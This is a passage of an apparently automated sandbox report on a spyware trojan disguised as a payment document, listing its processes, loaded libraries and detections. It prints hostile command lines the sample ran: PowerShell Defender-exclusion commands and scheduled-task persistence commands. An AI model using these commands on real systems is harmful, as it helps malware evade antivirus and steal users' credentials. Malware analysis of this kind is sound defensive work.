                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0321E6EC15_2_0321E6EC
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: String function: 01915130 appears 58 times
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: String function: 0194EA12 appears 86 times
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: String function: 01927E54 appears 107 times
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: String function: 018CB970 appears 262 times
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: String function: 0195F290 appears 103 times
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: String function: 02F35130 appears 58 times
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: String function: 02F6EA12 appears 86 times
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: String function: 02F47E54 appears 107 times
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: String function: 02EEB970 appears 262 times
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: String function: 02F7F290 appears 103 times
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: String function: 01597E54 appears 96 times
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: String function: 015BEA12 appears 36 times
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000000.1677274859.000000000093C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameohAw.exeH vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1724944126.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1733049993.0000000003D18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1733049993.0000000003CF9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1733049993.000000000452F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1742073643.0000000007570000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1739103302.00000000057B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1868118362.00000000019CD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1867547077.0000000001447000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXCOPY.EXEj% vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe | Binary or memory string: OriginalFilenameohAw.exeH vs PAYMENT SWIFT COPY.exe
                Source: PAYMENT SWIFT COPY.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PAYMENT SWIFT COPY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: NCchtKNKiPqC.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, N13ITUDLcClkUqkPFe.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, N13ITUDLcClkUqkPFe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, N13ITUDLcClkUqkPFe.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, N13ITUDLcClkUqkPFe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, k0D0gf3cPpP3GpvRZo.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, k0D0gf3cPpP3GpvRZo.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, k0D0gf3cPpP3GpvRZo.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, k0D0gf3cPpP3GpvRZo.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, k0D0gf3cPpP3GpvRZo.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, k0D0gf3cPpP3GpvRZo.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, k0D0gf3cPpP3GpvRZo.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, k0D0gf3cPpP3GpvRZo.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, k0D0gf3cPpP3GpvRZo.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, N13ITUDLcClkUqkPFe.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, N13ITUDLcClkUqkPFe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/16@16/10
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeFile created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMutant created: \Sessions\1\BaseNamedObjects\cWjcfJdFxKknPktgSyoXfkDLW
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeFile created: C:\Users\user\AppData\Local\Temp\tmpFA76.tmpJump to behavior
                Source: PAYMENT SWIFT COPY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PAYMENT SWIFT COPY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: xcopy.exe, 0000000F.00000003.2051311382.000000000299A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4139981371.000000000299A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PAYMENT SWIFT COPY.exeVirustotal: Detection: 22%
                Source: PAYMENT SWIFT COPY.exeReversingLabs: Detection: 27%
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeFile read: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"Jump to behavior
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: version.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: propsys.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: edputil.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: netutils.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: slc.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: sppc.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe    Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe    Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe    Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: onecorecommonproxystub.dll
